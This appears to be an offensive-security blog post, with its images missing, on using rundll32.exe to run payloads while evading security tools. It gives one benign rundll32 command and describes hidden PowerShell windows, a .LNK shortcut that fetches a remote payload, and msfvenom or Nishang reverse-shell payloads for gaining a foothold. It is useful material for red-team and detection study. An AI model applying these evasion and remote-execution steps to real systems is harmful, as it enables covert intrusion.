This program can be called to execute an arbitrary binary. This can be taking in as an advantage to avoid triggering security tools.
The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid trigering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.
Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions
Control_RunDLLAsuseralso Double-Clicking a .cpl file also causes rundll32.exe to execute.
This is a great way to execute our C2 binaries in case we need to upgrade our standard shell's to a C2 Framework this can be very helpful as with Post-Exploitation.
Information about our machine:
What about viewing our Network Connections
rundll32 shell32.dll,Control_RunDLL ncpa.cpl
Calling a Shell
Let's make this better. I mean our job is to go undetected, that big blue screen is a major RED-FLAG!!. Let's hide it [-w 1]
No Blue Screen, did it work?
Let's try and hide it so it can call the shell remotely by setting up a (.LNK) Shortcut and calling back our payload we will need to change a few names, like IP and file name so we can short it down to a few characters as the field for the name can only take so many. We will Right-Click >> New >> Shortcut
Will add the full path into the properties or URL path
And we can see below that our payload was successfully called and executed.
No output?. No worries that just tells us that the code executed fine.
As you can see rundll32 is a great way to execute files and also a way to get a foothold on the machine I used basic tools like msfvenom to create the DLL payload, or used a simple Nishang PowerShellTcp payload to create the payload being called remotely but of course there could be other way's, obfuscation can be added to avoid detection and other file's can be executed no need for them to be what I used, just demonstrated common payloads.